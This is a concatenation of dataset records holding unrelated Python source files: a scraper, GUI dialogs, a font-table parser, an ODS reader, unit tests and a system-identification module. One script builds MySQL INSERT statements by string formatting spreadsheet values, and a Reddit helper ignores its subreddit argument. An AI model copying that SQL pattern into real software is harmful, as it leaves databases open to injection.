s.experimentBase:\n masterTermVectorsWithPos[base.name] = OrderedDict(\n {term: position for position, term in enumerate(sorted(masterTermVectors[base.name].keys()), 0)})\n with open(Path(b.path, \"MasterTermVectorWithPos\" + base.name).with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(masterTermVectorsWithPos[base.name]))\n with open(Path(b.path, \"MasterTermVector\" + base.name).with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(masterTermVectors[base.name].data()))\n\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n for base in s.experimentBase:\n modelTemplate.train(masterTermVectorsWithPos[base.name], base)\n modelTemplate.saveLinks(base)\n\n copy_tree('resources/trainingData', str(Path(b.path) / 'trainingData'))\n else:\n logger.info('Skipping model training phase')\n\n if s.load:\n logger.info('Loading resources from previous phases/runs')\n for base in s.experimentBase:\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n modelTemplate.loadModels(base)\n modelTemplate.loadLinks(base)\n with open(Path(b.path, \"MasterTermVectorWithPos\" + base.name).with_suffix(\".json\")) as f:\n masterTermVectorsWithPos[base.name] = jload(f)\n logger.info(f\"Master term vector {base.name} has been loaded\")\n\n if s.classify:\n logger.info(s.classifierWeights)\n sti = STIClassifier(s.dbpediaFullClassHiearchy, s.stiDebug)\n classifierAggregator = ClassifierAggregator(sti, ModelTemplates, masterTermVectorsWithPos, s.lhdDataset,\n s.classifierWeights, s.thresholdingStrategy, \"Full\", s.threshold, s.finalTypeSelectionStrategy)\n classifierAggregator.processResources(s.toClassify1, s.resultFile1)\n classifierAggregator.processResources(s.toClassify2, s.resultFile2)\n classifierAggregator.processResources(s.toClassify3, s.resultFile3)\n # cProfile.run('classifierAggregator.processResources(s.toClassify2, s.resultFile2)')\n\n if s.evaluate:\n results = {}\n evaluator = HiearchicalEvaluator(str(s.dbpeadiaBase))\n results[str(s.toClassify1)] = evaluator.perform_eval(s.resultFile1, s.toClassify1)\n results[str(s.toClassify2)] = evaluator.perform_eval(s.resultFile2, s.toClassify2)\n results[str(s.toClassify3)] = evaluator.perform_eval(s.resultFile3, s.toClassify3)\n\n logger.info(results)\n with open(Path(b.path, \"results\").with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(results))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612839183","text":"import dryscrape\nfrom bs4 import BeautifulSoup\nimport webbrowser\nname=input('Enter name : ')\nfile_name=name+'.txt'\nfw=open(file_name,'r')\nst=str(fw.read())\nfw.close()\nfirstHref=st\nprint('first href is '+firstHref)\nurl_name=''\nif(name=='Ankit_singh'):\n url_name='akt_rabbit'\nelse:\n url_name='abisbaba1'\nurl='https://www.hackerearth.com/submissions/'+url_name+'/'\nses=dryscrape.Session()\nses.visit(url)\nr=ses.body()\nsoup=BeautifulSoup(r,'html.parser')\nlink = soup.find_all('a' , class_='no-color hover-link')\nl=0;\nfor x in link:\n if(firstHref.find(x['href'])!=-1):\n break\n l+=1;\n\nif(l==0):\n print('No recent submission')\nelse:\n print('Total problem solved '+str(l))\n fw=open(file_name,'w')\n fw.write(link[0]['href'])\n fw.close()\n print('Enter YES to open all the question : ')\n whatDO = input()\n if (whatDO == 'YES'):\n km = 0\n base_url = 'https://www.hackerearth.com'\n for x in link:\n if (km == l):\n break;\n url = base_url + x['href']\n webbrowser.open(url)\n km += 1\n","sub_path":"Friends-submission.py","file_name":"Friends-submission.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"68426384","text":"#\n# Python GUI - Dialogs - Generic\n#\n\nfrom GUI import Globals\nfrom GUI.Properties import overridable_property\nfrom GUI.Actions import ActionBase, action_property\nfrom GUI import Window\n\nclass Dialog(Window, ActionBase):\n\n\t_default_keys = \"\\r\"\n\t_cancel_keys = \"\\x1b\"\n\n\tdefault_button = overridable_property('default_button',\n\t\t\"Button to be activated by the default key.\")\n\t\n\tcancel_button = overridable_property('cancel_button',\n\t\t\"Button to be activated by the cancel key.\")\n\t\n\t_default_button = None\n\t_cancel_button = None\n\n\tdefault_action = action_property('default_action',\n\t\t\"Action to perform when Return or Enter is pressed.\")\n\t\n\tcancel_action = action_property('cancel_action',\n\t\t\"Action to perform when Escape is pressed.\")\n\t\n\t_default_action = 'ok'\n\t_cancel_action ='cancel'\n\n\tdef __init__(self, style = 'nonmodal_dialog', \n\t\t\tclosable = 0, zoomable = 0, resizable = 0, **kwds):\n\t\tif 'title' not in kwds:\n\t\t\tkwds['title'] = Globals.application_name\n\t\tWindow.__init__(self, style = style, \n\t\t\tclosable = closable, zoomable = zoomable, resizable = resizable,\n\t\t\t**kwds)\n\t\n\tdef get_default_button(self):\n\t\treturn self._default_button\n\t\n\tdef set_default_button(self, button):\n\t\tself._default_button = button\n\t\tif button:\n\t\t\tbutton.style = 'default'\n\t\t\tif not button.action:\n\t\t\t\tbutton.action = 'do_default_action'\n\t\n\tdef get_cancel_button(self):\n\t\treturn self._cancel_button\n\t\n\tdef set_cancel_button(self, button):\n\t\tself._cancel_button = button\n\t\tif button:\n\t\t\tbutton.style = 'cancel'\n\t\t\tif not button.action:\n\t\t\t\tbutton.action = 'do_cancel_action'\n\n\tdef key_down(self, event):\n\t\t#print \"GDialog.key_down:\", repr(event.char) ###\n\t\tc = event.char\n\t\tif c:\n\t\t\tif c in self._default_keys:\n\t\t\t\tself._activate_button(self.default_button) or self.do_default_action()\n\t\t\t\treturn\n\t\t\telif c in self._cancel_keys:\n\t\t\t\tself._activate_button(self.cancel_button) or self.do_cancel_action()\n\t\t\t\treturn\n\t\tWindow.key_down(self, event)\n\n\tdef do_default_action(self):\n\t\tself.do_named_action('default_action')\n\n\tdef do_cancel_action(self):\n\t\tself.do_named_action('cancel_action')\n\n\tdef _activate_button(self, button):\n\t\t#print(\"GDialog._activate_button:\", button)\n\t\tif button:\n\t\t\tbutton.activate()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n","sub_path":"GUI/Generic/GDialogs.py","file_name":"GDialogs.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"577236091","text":"# -*- coding:utf-8 -*-\n# 读取Excel数据插入mysql 问题:插入中文会出现乱码。\nimport pandas as pd\nfrom MysqlHelper import MysqlHelper\n\n\nsqlhelper = MysqlHelper('127.0.0.1', 3306, 'test', 'root', '1234')\ndf = pd.read_excel('D:\\\\work\\\\isoftstone\\\\pandastest\\\\test02.xlsx',sheet_name='Sheet1')\n\n# print df\n\nfor index, row in df.iterrows():\n # print row\n # print row['name'], row['age'], row['class']\n # sql = \"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\".format(row['name'],row['age'],row['class'])\n # sql = \"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\".format(row['name'],row['age'],row['class'])\n # sql = \"INSERT INTO stu01(name,age,class) VALUES('{name}','{age}','{clazz}')\".format(name='12',age=25,clazz='36')\n #待解决插入中文乱码??\n sql = \"INSERT INTO stu01(name,age,class) VALUES('{name}','{age}','{clazz}')\".format(name=row['name'],age=row['age'],clazz=row['class'])\n\n sqlhelper.insert(sql)\n\n# params=['1',2,'3']\n# sql=\"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\"\n\n\n\n\n\n\n\n\n\n","sub_path":"pandas/pandastest08.py","file_name":"pandastest08.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"76922163","text":"#\n# MTet.py\n#\n# Copyright © 2007-2008, 2010, 2013 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nDefinitions relating to the entire MTet table, which has information on times\neach glyph in a font was last edited.\n\"\"\"\n\n# System imports\nimport datetime\n\n# Other imports\nfrom fontio3.fontdata import mapmeta\n\n# -----------------------------------------------------------------------------\n\n#\n# Classes\n#\n\nclass MTet(dict, metaclass=mapmeta.FontDataMetaclass):\n \"\"\"\n Objects representing entire 'MTet' tables. These are dicts whose keys are\n glyph indices and whose values are integers representing the number of\n seconds elapsed since midnight, January 1, 1904.\n \n >>> _testingValues[1].pprint()\n 0: 2015-11-25 04:09:04\n 1: 2015-11-25 09:42:24\n 2: 2015-11-24 00:22:24\n 3: 2015-11-25 04:09:04\n \n >>> _testingValues[1].pprint(namer=namer.testingNamer())\n xyz1: 2015-11-25 04:09:04\n xyz2: 2015-11-25 09:42:24\n xyz3: 2015-11-24 00:22:24\n xyz4: 2015-11-25 04:09:04\n \"\"\"\n \n #\n # Class definition variables\n #\n \n def _pf(p, n, label, **kwArgs):\n dBase = datetime.datetime(1904, 1, 1)\n p.simple(str(dBase + datetime.timedelta(seconds=n)), label=label)\n \n mapSpec = dict(\n item_pprintfunc = _pf,\n item_renumberdirectkeys = True,\n item_usenamerforstr = True)\n \n del _pf\n \n #\n # Class methods\n #\n \n @classmethod\n def fromwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a MTet object from the specified walker.\n \n >>> d = {'fontGlyphCount': 4}\n >>> _testingValues[1] == MTet.frombytes(_testingValues[1].binaryString(), **d)\n True\n \n >>> _testingValues[0] == MTet.frombytes(_testingValues[0].binaryString(), **d)\n Traceback (most recent call last):\n ...\n ValueError: 'MTet' entry count (0) does not match font glyph count (4)\n \"\"\"\n \n version = w.unpack(\"L\")\n \n if version != 0x10000:\n raise ValueError(\"Unknown 'MTet' version: 0x%08X\" % (version,))\n \n fgc = kwArgs['fontGlyphCount']\n t = w.unpackRest(\"L\")\n \n if len(t) != fgc:\n s = \"'MTet' entry count (%d) does not match font glyph count (%d)\"\n raise ValueError(s % (len(t), fgc))\n \n return cls(zip(range(fgc), t))\n \n #\n # Public methods\n #\n \n def buildBinary(self, w, **kwArgs):\n \"\"\"\n Adds the binary data for the MTet object to the specified LinkedWriter.\n \n >>> utilities.hexdump(_testingValues[1].binaryString())\n 0 | 0001 0000 D27A E4E0 D27B 3300 D279 5E40 |.....z...{3..y^@|\n 10 | D27A E4E0 |.z.. |\n \"\"\"\n \n count = len(self)\n \n if set(self) != set(range(count)):\n raise ValueError(\"MTet keys are not dense!\")\n \n if 'stakeValue' in kwArgs:\n stakeValue = kwArgs.pop('stakeValue')\n w.stakeCurrentWithValue(stakeValue)\n else:\n stakeValue = w.stakeCurrent()\n \n w.add(\"L\", 0x10000) # version\n w.addGroup(\"L\", (self[i] for i in range(count)))\n \n def setToNow(self, iterable):\n \"\"\"\n Sets the timestamp for all glyph indices in iterable to now.\n \n >>> d = _testingValues[1].__copy__()\n >>> d[0] == d[2], d[0] == _testingValues[1][0], d[2] == _testingValues[1][2]\n (False, True, True)\n >>> d.setToNow([0, 2])\n >>> d[0] == d[2], d[0] == _testingValues[1][0], d[2] == _testingValues[1][2]\n (True, False, False)\n \"\"\"\n \n nowDelta = datetime.datetime.now() - datetime.datetime(1904, 1, 1)\n now = nowDelta.days * 86400 + nowDelta.seconds\n \n for glyphIndex in iterable:\n self[glyphIndex] = now\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n def __________________(): pass\n\nif __debug__:\n from fontio3 import utilities\n from fontio3.utilities import namer\n \n _testingValues = (\n MTet(),\n MTet({0: 3531269344, 1: 3531289344, 2: 3531169344, 3: 3531269344}))\n\ndef _test():\n import doctest\n doctest.testmod()\n\nif __name__ == \"__main__\":\n if __debug__:\n _test()\n","sub_path":"fontio3/build/lib.linux-x86_64-3.6/fontio3/MTet.py","file_name":"MTet.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568229376","text":"\"\"\"\n pyexcel_ods3.ods\n ~~~~~~~~~~~~~~~~~~~\n\n ODS format plugin for pyexcel\n\n :copyright: (c) 2015-2016 by Onni Software Ltd. & its contributors\n :license: New BSD License\n\"\"\"\nimport sys\nimport math\nimport datetime\nimport ezodf\n\nfrom pyexcel_io.book import BookReader, BookWriter\nfrom pyexcel_io.sheet import SheetReader, SheetWriter\n\nPY2 = sys.version_info[0] == 2\nif PY2 and sys.version_info[1] < 7:\n from ordereddict import OrderedDict\nelse:\n from collections import OrderedDict\n\n\ndef is_integer_ok_for_xl_float(value):\n if value == math.floor(value):\n return True\n else:\n return False\n\n\ndef float_value(value):\n ret = float(value)\n return ret\n\n\ndef date_value(value):\n ret = \"invalid\"\n try:\n # catch strptime exceptions only\n if len(value) == 10:\n ret = datetime.datetime.strptime(\n value,\n \"%Y-%m-%d\")\n ret = ret.date()\n elif len(value) == 19:\n ret = datetime.datetime.strptime(\n value,\n \"%Y-%m-%dT%H:%M:%S\")\n elif len(value) > 19:\n ret = datetime.datetime.strptime(\n value[0:26],\n \"%Y-%m-%dT%H:%M:%S.%f\")\n except:\n pass\n if ret == \"invalid\":\n raise Exception(\"Bad date value %s\" % value)\n return ret\n\n\ndef time_value(value):\n hour = int(value[2:4])\n minute = int(value[5:7])\n second = int(value[8:10])\n if hour < 24:\n return datetime.time(hour, minute, second)\n else:\n return datetime.timedelta(hours=hour, minutes=minute, seconds=second)\n\n\n\ndef boolean_value(value):\n return value\n\n\nODS_FORMAT_CONVERSION = {\n \"float\": float,\n \"date\": datetime.date,\n \"time\": datetime.time,\n \"boolean\": bool,\n \"percentage\": float,\n \"currency\": float\n}\n\n\nODS_WRITE_FORMAT_COVERSION = {\n float: \"float\",\n int: \"float\",\n str: \"string\",\n datetime.date: \"date\",\n datetime.time: \"time\",\n datetime.timedelta: \"timedelta\",\n bool: \"boolean\"\n}\n\n\nVALUE_CONVERTERS = {\n \"float\": float_value,\n \"date\": date_value,\n \"time\": time_value,\n \"boolean\": boolean_value,\n \"percentage\": float_value,\n \"currency\": float_value\n}\n\n\nVALUE_TOKEN = {\n \"float\": \"value\",\n \"date\": \"date-value\",\n \"time\": \"time-value\",\n \"boolean\": \"boolean-value\",\n \"percentage\": \"value\",\n \"currency\": \"value\"\n}\n\n\nif sys.version_info[0] < 3:\n ODS_WRITE_FORMAT_COVERSION[unicode] = \"string\"\n\n\nclass ODSSheet(SheetReader):\n def __init__(self, sheet, auto_detect_int=True, **keywords):\n SheetReader.__init__(self, sheet, **keywords)\n self.auto_detect_int = auto_detect_int\n\n @property\n def name(self):\n return self.native_sheet.name\n\n def to_array(self):\n \"\"\"reads a sheet in the sheet dictionary, storing each sheet\n as an array (rows) of arrays (columns)\"\"\"\n for row in range(self.native_sheet.nrows()):\n row_data = []\n tmp_row = []\n for cell in self.native_sheet.row(row):\n cell_value = self._read_cell(cell)\n tmp_row.append(cell_value)\n if cell_value is not None and cell_value != '':\n row_data += tmp_row\n tmp_row = []\n if len(row_data) > 0:\n yield row_data\n\n def _read_cell(self, cell):\n cell_type = cell.value_type\n ret = None\n if cell_type in ODS_FORMAT_CONVERSION:\n value = cell.value\n n_value = VALUE_CONVERTERS[cell_type](value)\n if cell_type == 'float' and self.auto_detect_int:\n if is_integer_ok_for_xl_float(n_value):\n n_value = int(n_value)\n ret = n_value\n else:\n if cell.value is None:\n ret = \"\"\n else:\n ret = cell.value\n return ret\n\n\n\nclass ODSBook(BookReader):\n\n def __init__(self):\n BookReader.__init__(self)\n self.native_book = None\n\n def open(self, file_name, **keywords):\n BookReader.open(self, file_name, **keywords)\n self._load_from_file()\n\n def open_stream(self, file_stream, **keywords):\n BookReader.open_stream(self, file_stream, **keywords)\n self._load_from_memory()\n\n def read_sheet_by_name(self, sheet_name):\n rets = [sheet for sheet in self.native_book.sheets if sheet.name == sheet_name]\n if len(rets) == 0:\n raise ValueError(\"%s cannot be found\" % sheet_name)\n elif len(rets) == 1:\n return self._read_sheet(rets[0])\n else:\n raise ValueError(\n \"More than 1 sheet named as %s are found\" % sheet_name)\n pass\n\n def read_sheet_by_index(self, sheet_index):\n sheets = self.native_book.sheets\n length = len(sheets)\n if sheet_index < length:\n return self._read_sheet(sheets[sheet_index])\n else:\n raise IndexError(\"Index %d of out bound %d.\" % (sheet_index,\n length))\n\n def read_all(self):\n result = OrderedDict()\n for sheet in self.native_book.sheets:\n ods_sheet = ODSSheet(sheet, **self.keywords)\n result[ods_sheet.name] = ods_sheet.to_array()\n return result\n\n def _read_sheet(self, native_sheet):\n sheet = ODSSheet(native_sheet, **self.keywords)\n return {native_sheet.name: sheet.to_array()}\n\n\n def _load_from_file(self):\n self.native_book = ezodf.opendoc(self.file_name)\n\n def _load_from_memory(self):\n self.native_book = ezodf.opendoc(self.file_stream)\n\n\nclass ODSSheetWriter(SheetWriter):\n \"\"\"\n ODS sheet writer\n \"\"\"\n def set_sheet_name(self, name):\n self.native_sheet = ezodf.Sheet(name)\n self.current_row = 0\n\n def set_size(self, size):\n self.native_sheet.reset(size=size)\n\n def write_row(self, array):\n \"\"\"\n write a row into the file\n \"\"\"\n count = 0\n for cell in array:\n value_type = ODS_WRITE_FORMAT_COVERSION[type(cell)]\n if value_type == \"time\":\n cell = cell.strftime(\"PT%HH%MM%SS\")\n elif value_type == \"timedelta\":\n hours = cell.days * 24 + cell.seconds // 3600\n minutes = (cell.seconds // 60) % 60\n seconds = cell.seconds % 60\n cell = \"PT%02dH%02dM%02dS\" % (hours, minutes, seconds)\n value_type = \"time\"\n self.native_sheet[self.current_row, count].set_value(\n cell,\n value_type=value_type)\n count += 1\n self.current_row += 1\n\n def close(self):\n \"\"\"\n This call writes file\n\n \"\"\"\n self.native_book.sheets += self.native_sheet\n\n\nclass ODSWriter(BookWriter):\n \"\"\"\n open document spreadsheet writer\n\n \"\"\"\n def __init__(self):\n BookWriter.__init__(self)\n self.native_book = None\n\n def open(self, file_name, **keywords):\n BookWriter.open(self, file_name, **keywords)\n self.native_book = ezodf.newdoc(doctype=\"ods\", filename=self.file_alike_object)\n\n skip_backup_flag = self.keywords.get('skip_backup', True)\n if skip_backup_flag:\n self.native_book.backup = False\n\n def create_sheet(self, name):\n \"\"\"\n write a row into the file\n \"\"\"\n return ODSSheetWriter(self.native_book, None, name)\n\n def close(self):\n \"\"\"\n This call writes file\n\n \"\"\"\n self.native_book.save()\n\n\n_ods_registry = {\n \"file_type\": \"ods\",\n \"reader\": ODSBook,\n \"writer\": ODSWriter,\n \"stream_type\": \"binary\",\n \"mime_type\": \"application/vnd.oasis.opendocument.spreadsheet\",\n \"library\": \"ezodf\"\n}\n\nexports = (_ods_registry, )\n","sub_path":"pyexcel_ods3/ods.py","file_name":"ods.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593448583","text":"# run python -m unittest tests.test_classes on parent directory\n\nimport unittest\nfrom classes import FamilyPromotion, Group, Bike, Period, Rent\n\n\nbikes = []\nperiods = []\n\ndef setUpModule():\n for bike in range(1,8):\n bikes.append(Bike(1,True))\n for period in ((\"A\",2), (\"B\",4), (\"C\",8)):\n periods.append(Period(period[0],period[1]))\n\n\ndef tearDownModule():\n pass\n\n\nclass TestGroup(unittest.TestCase):\n\n def test_calculate_price_1(self):\n rents = [Rent(bikes[0],periods[0]),\n Rent(bikes[1],periods[0])]\n group = Group(rents)\n group.calculate_price()\n self.assertEqual(4, group.subtotal)\n \n\n def test_calculate_price_2(self):\n rents = [Rent(bikes[0],periods[2])]\n group = Group(rents)\n group.calculate_price()\n self.assertEqual(8, group.subtotal)\n\n\n\nclass TestFamilyPromotion(unittest.TestCase):\n\n def test_calculate_price(self):\n rents = [Rent(bikes[0],periods[0]),\n Rent(bikes[1],periods[2])]\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n family_promotion.calculate_price()\n self.assertEqual(7, group.subtotal)\n \n\n def test_is_eligible_1(self):\n rents = []\n for n in range(2):\n rents.append(Rent(bikes[n], periods[0]))\n\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(False, family_promotion.is_eligible())\n \n\n\n def test_is_eligible_2(self):\n rents = []\n for n in range(4):\n rents.append(Rent(bikes[n], periods[0]))\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(True, family_promotion.is_eligible())\n\n\n def test_is_eligible_3(self):\n rents = []\n for n in range(6):\n rents.append(Rent(bikes[n], periods[0]))\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(False, family_promotion.is_eligible())\n \n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"254713801","text":"from deepSI.system_data import System_data, System_data_list, System_data_norm\nimport deepSI\nimport numpy as np\nimport pickle\nfrom secrets import token_urlsafe\nimport copy\nimport gym\nfrom gym.spaces import Box\nfrom matplotlib import pyplot as plt\n\ndef load_system(file):\n \"\"\"This is not a safe function, only use on trusted files\"\"\"\n try:\n return pickle.load(open(file,'rb'))\n except (pickle.UnpicklingError, EOFError): #maybe it was saved using torch systems\n import torch\n return torch.load(file)\n\n\nclass System(object):\n '''The base System class\n\n Attributes\n ----------\n action_space : gym.space or None\n the input shape of input u. (None is a single unbounded float)\n observation_space : gym.space or None\n The input shape of output y. (None is a single unbounded float)\n norm : instance of System_data_norm\n Used in most fittable systems to normalize the input output.\n fitted : Boole\n unique_code : str\n Some random unique 4 digit code (can be used for saving/loading)\n name : str\n concatenation of the the class name and the unique code\n use_norm : bool\n seed : int\n random seed\n random : np.random.RandomState\n unique random generated initialized with seed (only created ones called)\n '''\n def __init__(self, action_space=None, observation_space=None):\n '''Create a System\n\n Parameters\n ----------\n action_space : gym.space or None\n the input shape of input u. (None is a single unbounded float)\n observation_space : gym.space or None\n The input shape of output y. (None is a single unbounded float)\n '''\n self.action_space, self.observation_space = action_space, observation_space\n self.norm = System_data_norm()\n self.fitted = False\n self.unique_code = token_urlsafe(4).replace('_','0').replace('-','a') #random code\n self.seed = 42\n self.use_norm = True #can be changed later\n self._dt = None\n\n @property\n def name(self):\n return self.__class__.__name__ + '_' + self.unique_code\n @property\n def random(self): #gets created ones called, this is to make pickle more stable between different version of numpy\n if not hasattr(self,'_random'):\n self._random = np.random.RandomState(seed=self.seed)\n return self._random\n def get_state(self):\n '''state of the system (not the parameters)\n\n Returns\n -------\n state : the user defined state\n '''\n import warnings\n warnings.warn('Calling sys.state but no state has been set')\n return None\n\n def apply_experiment(self, sys_data, save_state=False): #can put this in apply controller\n '''Does an experiment with for given a system data (fixed u)\n\n Parameters\n ----------\n sys_data : System_data or System_data_list (or list or tuple)\n The experiment which should be applied\n\n Notes\n -----\n This will initialize the state using self.init_state if sys_data.y (and u)\n is not None and skip the appropriate number of steps associated with it.\n If either is missing than self.reset() is used to initialize the state. \n Afterwards this state is advanced using sys_data.u and the output is saved at each step.\n Lastly, the number of skipped/copied steps in init_state is saved as sys_data.cheat_n such \n that it can be accounted for later.\n '''\n\n if isinstance(sys_data,(tuple,list,System_data_list)):\n return System_data_list([self.apply_experiment(sd, save_state=save_state) for sd in sys_data])\n Y = []\n sys_data_norm = self.norm.transform(sys_data) #do this correctly\n \n dt_old = self.dt\n self.dt = sys_data.dt #calls the setter\n\n U = sys_data_norm.u\n if sys_data_norm.y is not None: #if y is not None than init state\n obs, k0 = self.init_state(sys_data_norm) #is reset if init_state is not defined #normed obs\n Y.extend(sys_data_norm.y[:k0]) #h(x_{k0-1})\n else:\n obs, k0 = self.reset(), 0\n\n if save_state:\n X = [self.get_state()]*(k0+1)\n\n for k in range(k0,len(U)):\n Y.append(obs) \n if k0)*2-1] for i in range(500)]) #mountain car solve\n # print(sys)\n # exp = System_data(u=[sys.action_space.sample() for i in range(500)]) \n # print(exp.u.dtype)\n # sys_data =sys.apply_experiment(exp)\n # print(sys_data)\n # sys_data.plot(show=True)\n\n # sys = deepSI.systems.Nonlin_io_normals()\n # exp = System_data(u=np.random.normal(scale=2,size=100))\n # print(sys.step(1))\n # sys_data = sys.apply_experiment(exp)\n # # sys_data.plot(show=True)\n # sys = deepSI.systems.SS_test()\n # sys_data = sys.apply_experiment(exp)\n # sys_data.plot()\n\n # sys.save_system('../../testing/test.p')\n # del sys\n # sys = load_system('../../testing/test.p')\n\n # sys_data = sys.apply_experiment(exp)\n # sys_data.plot(show=True)\n\n #deriv testing\n # class barrier(System_deriv):\n # \"\"\"docstring for barrier\"\"\"\n # def __init__(self, method='RK4'):\n # super(barrier, self).__init__(nx=2,dt=0.1,method=method)\n \n # def deriv(self,x,u):\n # x,vx = x\n # dxdt = vx\n # alpha = 0.01\n # dvxdt = - 1e-3*vx + alpha*( - 1/(x-1)**2 + 1/(x+1)**2) + u\n # return [dxdt,dvxdt]\n\n # def h(self,x):\n # return x[0]\n\n # np.random.seed(32)\n # sys = barrier(method='RK45')\n # exp = deepSI.System_data(u=np.random.uniform(-1,1,size=500))\n # d = sys.apply_experiment(exp)\n # d.plot(show=True)\n","sub_path":"deepSI/systems/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183052036","text":"from math import *\n\ndef koordinate(ime,kraji):\n s = ()\n for kraj,x1,y1 in kraji:\n if ime == kraj:\n s += x1,y1\n if s == ():\n s = None\n return(s)\n\ndef razdalja_koordinat(x1, y1, x2, y2):\n return(sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2))\n\ndef razdalja(ime1, ime2, kraji):\n s1 = koordinate(ime1,kraji)\n s2 = koordinate(ime2,kraji)\n r = razdalja_koordinat(s1[0],s1[1],s2[0],s2[1])\n return(r)\n\ndef v_dometu(ime, domet, kraji):\n\n s = []\n for kraj in kraji:\n r = razdalja(ime, kraj[0], kraji)\n if r > 0.0:\n if r <= domet:\n s.append(kraj[0])\n return s\n\ndef najbolj_oddaljeni(ime, imena, kraji):\n naj_razdalja = 0\n naj_kraj = None\n for ime2 in imena:\n if razdalja(ime,ime2,kraji) >= naj_razdalja:\n naj_razdalja = razdalja(ime,ime2,kraji)\n naj_kraj = ime2\n return naj_kraj\n\ndef zalijemo(ime, domet, kraji):\n return(najbolj_oddaljeni(ime,v_dometu(ime,domet,kraji),kraji))\n\n","sub_path":"code/batch-1/vse-naloge-brez-testov/DN4-M-176.py","file_name":"DN4-M-176.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427845132","text":"'''\nCreated on Nov 8, 2015\n\n@author: zhuoli\n'''\nimport datetime\nimport os\n\nimport Constant\n\n\nLOG_PATH = Constant.DATA_ROOT + \"/Coin.log\"\ndef AssertEqual(a, b):\n if a != b:\n raise Exception('Not equal');\n\ndef Log(message):\n if not os.path.exists(Constant.DATA_ROOT):\n os.makedirs(Constant.DATA_ROOT)\n time = str(datetime.datetime.now())\n secondIndex = time.rfind(':')\n time = time[:secondIndex]\n with open(LOG_PATH, \"a\") as log:\n log.write(time + ' : \"' + message + '\"\\n')","sub_path":"source/Errors.py","file_name":"Errors.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"297638371","text":"'''\r\nPython Code Snippets #22\r\n109-Validate email address\r\n\r\nTested on Python V3.6x, Window 7\r\n\r\npip3 install lepl\r\n\r\nsource:\r\nhttp://code.activestate.com/recipes/\r\n65215-e-mail-address-validation/?in=user-114221\r\n'''\r\nfrom lepl.apps.rfc3696 import Email\r\n#Email function does not take an argument, it is just a validator\r\n\r\nt1 = Email()\r\n\r\nif t1('bollo@tesco.co.uk'):\r\n print(\"Looks like a valid Email address\")\r\nelse:\r\n print(\"Appears to be an invalid Email address\")\r\n","sub_path":"Python-code-snippets-101-200/109-validate email address.py","file_name":"109-validate email address.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472265953","text":"#!/usr/bin/python3\n\"\"\" save all of titles into hotlist\"\"\"\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=None):\n try:\n res = requests.get(\"https://www.reddit.com/r/{}/hot.json? \\\n limit=100&after={}\".format(subreddit, after),\n headers={'User-agent': 'reddit api calls'},\n allow_redirects=False)\n if (res.json().get(\"data\") is None):\n return None\n childrenlist = res.json().get(\"data\").get(\"children\")\n if ((res.json().get(\"data\").get(\"after\")) is None):\n return hot_list\n for i in range(0, len(childrenlist)):\n hot_list.append(childrenlist[i].get('data').get('title'))\n afterkey = res.json().get(\"data\").get(\"after\")\n return recurse(\"programming\", hot_list, afterkey)\n except:\n return None\n","sub_path":"0x18-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"461938921","text":"# -*- coding:utf-8 -*-\n# Copyright 2018 Huawei Technologies Co.,Ltd.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software distributed\n# under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations under the License.\n\n# C:\\Users\\xczx0627\\AppData\\Local\\Programs\\Python\\Python36\\scripts\\pyinstaller -F 